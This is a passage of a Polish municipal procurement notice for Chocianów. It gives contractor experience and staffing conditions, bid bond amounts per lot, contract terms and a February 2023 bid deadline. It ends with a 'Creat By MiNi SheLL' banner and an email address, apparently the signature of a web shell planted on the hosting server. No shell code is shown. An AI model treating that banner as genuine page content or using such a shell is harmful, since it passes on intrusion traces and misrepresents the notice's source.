class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.1.1.	Dla cz. I zamówienia Wykonawca musi wykazać, iż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie co najmniej:<br/>a)	co najmniej dwóch różnych zamówień o charakterze złożoności porównywalnej z zakresem przedmiotowym do niniejszego zamówienia w zakresie budowy, przebudowy, rozbudowy lub remontu budowlanych obiektów kubaturowych wraz z instalacjami w tym jedno o wartości minimum 600.000,00 zł.<br/>1.1.2.	Dla cz. II zamówienia Wykonawca musi wykazać, iż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie co najmniej:<br/>a)	co najmniej dwóch różnych zamówień o charakterze złożoności porównywalnej z zakresem przedmiotowym do niniejszego zamówienia w zakresie budowy, przebudowy, rozbudowy lub remontu budowlanych obiektów kubaturowych wraz z instalacjami w tym jedno o wartości minimum 300.000,00 zł.<br/>1.1.3.	Dla cz. III-IV zamówienia Wykonawca musi wykazać, iż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie co najmniej:<br/>a)	co najmniej dwa różne zamówienia o charakterze złożoności porównywalnej z zakresem przedmiotowym do niniejszego zamówienia w zakresie budowy, rozbudowy placów zabaw w tym jednego o wartości minimum 150.000,00 zł.<br/>1.1.4.	Dla cz. V zamówienia Wykonawca musi wykazać, iż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie co najmniej:<br/>a)	co najmniej dwa różne zamówienia o charakterze złożoności porównywalnej z zakresem przedmiotowym do niniejszego zamówienia w zakresie budowy, przebudowy, remontu boisk sportowych, w tym jedno o wartości minimum 400.000,00 zł.<br/>1.1.5.	Dla cz. VI zamówienia Wykonawca musi wykazać, iż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie co najmniej:<br/>a)	co najmniej jedno zamówienie o charakterze złożoności porównywalnej z zakresem przedmiotowym do niniejszego zamówienia w zakresie budowy, rozbudowy skateparku o wartości minimum 500.000,00 zł.<br/>1.1.6.	Dla cz. VII zamówienia Wykonawca musi wykazać, iż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie co najmniej:<br/>a)	co najmniej jedno zamówienie o charakterze złożoności porównywalnej z zakresem przedmiotowym do niniejszego zamówienia w zakresie dostawy i montażu totemów multimedialnych o wartości minimum 50.000,00 zł.<br/>1.1.7.	Dla cz. VIII-XI zamówienia Wykonawca musi wykazać, iż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie co najmniej:<br/>a)	co najmniej jedno zamówienie o charakterze złożoności porównywalnej z zakresem przedmiotowym do niniejszego zamówienia w zakresie nadzoru inwestorskiego branży konstrukcyjno-budowlanej.<br/><br/>1.1.8.	Dla cz. I zamówienia Wykonawca musi wykazać, że dysponuje co najmniej: <br/>a)	1 osobą – posiadającą aktualne uprawnienia budowlane bez ograniczeń w specjalności konstrukcyjno-budowlanej w zakresie do kierowania robotami budowlanymi lub odpowiadające im ważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów lub odpowiednie kwalifikacje uzyskane za granicą, uznane w Polsce na podstawie przepisów o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej, pełniącą obowiązki kierownika budowy,<br/>b)	1 osobą posiadającą aktualne uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych w zakresie do kierowania robotami budowlanymi, pełniącą obowiązki kierownika robót branży elektrycznej,<br/>c)	1 osobą posiadającą aktualne uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, pełniącą obowiązki kierownika robót branży sanitarnej.<br/>1.1.9.	Dla cz. II zamówienie Wykonawca musi wykazać, że dysponuje co najmniej:<br/>b)	1 osobą – posiadającą aktualne uprawnienia budowlane bez ograniczeń w specjalności konstrukcyjno-budowlanej w zakresie do kierowania robotami budowlanymi lub odpowiadające im ważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów lub odpowiednie kwalifikacje uzyskane za granicą, uznane w Polsce na podstawie przepisów o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej, pełniącą obowiązki kierownika budowy. <br/>c)	1 osobą posiadającą aktualne uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, pełniącą obowiązki kierownika robót branży sanitarnej.<br/>1.1.10.	Dla cz. III-IV zamówienia Wykonawca musi wykazać, że: <br/>a) 1 osobą – posiadającą aktualne uprawnienia budowlane w specjalności konstrukcyjno-budowlanej w zakresie do kierowania robotami budowlanymi lub odpowiadające im ważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów lub odpowiednie kwalifikacje uzyskane za granicą, uznane w Polsce na podstawie przepisów, pełniącą obowiązki kierownika robót, o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej, pełniącą obowiązki kierownika budowy.<br/>1.1.11.	Dla cz. V-VI zamówienia Wykonawca musi wykazać, że: <br/>a)	1 osobą – posiadającą aktualne uprawnienia budowlane w specjalności konstrukcyjno-budowlanej w zakresie do kierowania robotami budowlanymi lub odpowiadające im ważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów lub odpowiednie kwalifikacje uzyskane za granicą, uznane w Polsce na podstawie przepisów o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej, pełniącą obowiązki kierownika budowy.<br/>1.1.12.	Dla cz. VII Wykonawca musi wykazać dysponowanie co najmniej:<br/>a)	1 osobą posiadającą aktualne uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych w zakresie do kierowania robotami budowlanymi, pełniącą obowiązki kierownika robót branży elektrycznej.<br/>1.1.13.	Dla cz. VIII Wykonawca musi wykazać dysponowanie co najmniej: <br/>a)	1 osobą pełniącą funkcję inspektora nadzoru inwestorskiego posiadającą uprawnienia branży konstrukcyjno-budowlanej,<br/>b)	1 osobą pełniącą funkcję inspektora nadzoru inwestorskiego posiadającą uprawnienia branży elektroenergetycznej – w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.<br/>a)	1 osobą pełniącą funkcję inspektora nadzoru inwestorskiego posiadającą uprawnienia branży sanitarnej – w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych.<br/>1.1.14.	Dla cz. IX Wykonawca musi wykazać dysponowanie co najmniej: <br/>a)	1 osobą pełniącą funkcję inspektora nadzoru inwestorskiego posiadającą uprawnienia w branży konstrukcyjno-budowlanej,<br/>b)	1 osobą pełniącą funkcję inspektora nadzoru inwestorskiego posiadającą uprawnienia branży sanitarnej – w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych.<br/>1.1.15.	Dla cz. X-XI Wykonawca musi wykazać dysponowanie co najmniej: <br/>a)	1 osobą pełniącą funkcję inspektora nadzoru inwestorskiego posiadającą uprawnienia w branży konstrukcyjno-budowlanej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) oświadczenia Wykonawcy<br/>o niepodleganiu wykluczeniu z postępowania oraz o spełnianiu warunków udziału w postępowaniu<br/>2) Oświadczenie o niepodleganiu wykluczeniu składane na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych<br/>rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.<br/>U. poz. 835)</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)wykaz wykonanych robót budowlanych wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz<br/>których roboty budowlane zostały wykonane – wg załącznika nr 5 do SWZ oraz dowodów (referencje bądź inne dokumenty)<br/>potwierdzających, czy roboty budowlane wyszczególnione na załączniku nr 5 do SWZ zostały wykonane należycie, szczególnie<br/>informacji o tym, czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone/b)	wykazu wykonanych usług wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których usługi zostały wykonane – wg załącznika nr 5 do SWZ oraz dowodów (referencje bądź inne dokumenty) potwierdzających, czy usługi wyszczególnione na załączniku nr 5 do SWZ zostały wykonane należycie/ b)	wykazu wykonanych dostaw wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których dostawy zostały wykonane – wg załącznika nr 5 do SWZ oraz dowodów (referencje bądź inne dokumenty) potwierdzających, czy dostawy wyszczególnione na załączniku nr 5 do SWZ zostały wykonane należycie.<br/><br/>b) wykaz osób – wg załącznika nr 4 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Oferta dla cz. I-VII musi być zabezpieczona wadium (z wyłączeniem części VIII-XI).<br/>2.	Wadium wynosi <br/>1)	Część I - Przebudowa budynku przy ul. 3 Maja w Chocianowie pod potrzeby utworzenia Chocianowskiego Centrum Informacji turystycznej – 15.000,00 zł (słownie: piętnaście tysięcy zł 00/100).<br/>2)	Część II - Przebudowa pomieszczeń w świetlicy wiejskiej w Brunowie z przeznaczeniem na salę do ćwiczeń fitness – 7.000,00 zł (słownie: siedem tysięcy zł 00/100).<br/>3)	Część III – Budowa placów zabaw oraz doposażenie istniejących placów zabaw – 10.000,00 zł (słownie: dziesięć tysięcy zł 00/100).<br/>4)	Część IV – Budowa placu zabaw oraz strefy seniora w Chocianowie oraz strefy relaksu w Chocianowcu – 15.000,00 zł (słownie: piętnaście tysięcy zł 00/100).<br/>5)	Część V – Budowa oraz przebudowa boisk wielofunkcyjnych – 10.000,00 zł (słownie: dziesięć tysięcy zł 00/100)<br/>6)	Część VI – Budowa skateparku z pumptrackiem – 10.000,00 zł (słownie: dziesięć tysięcy zł 00/100).<br/>7)	Część VII – Multimedialne zewnętrzne totemy dwustronne – 4.000,00 zł (słownie: cztery tysiące zł 00/100).<br/><br/>3.	Wadium należy wnieść przed upływem terminu składania ofert i utrzymywać nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w niniejszym rozdziale SWZ.<br/>4.	Formy wnoszenia wadium: wadium może być wniesione według wyboru Wykonawcy w jednej lub kilku następujących formach:<br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tj. Dz.U. z 2020r. poz. 299).<br/>5.	Termin wnoszenia wadium upływa w dniu: 27.02.2023 o godzinie 10:00;00. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do treści tej umowy, zawiera załącznik nr 7 do SWZ.<br/>1.1.	Zamawiający przewiduje możliwość zmian postanowień zawartej umowy (tzw. zmiany kontraktowe w oparciu o art. 455 ust. 1 pkt 1 ustawy) w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, zgodnie z warunkami zawartymi w załączniku nr 7 do SWZ.<br/>1.2.	Dopuszcza się zmianę zapisów stanowiących oczywistą omyłkę.<br/>2.	Zapisy dotyczące możliwości zmiany umowy określone zostały szczegółowo w projekcie umowy stanowiącym załącznik nr 7 do SWZ. <br/>3.	Przed zawarciem umowy należy dopełnić formalności, które zostały wskazane w Rozdziale XXIX SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-02-27 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">htttps://chocianow.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-02-27 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com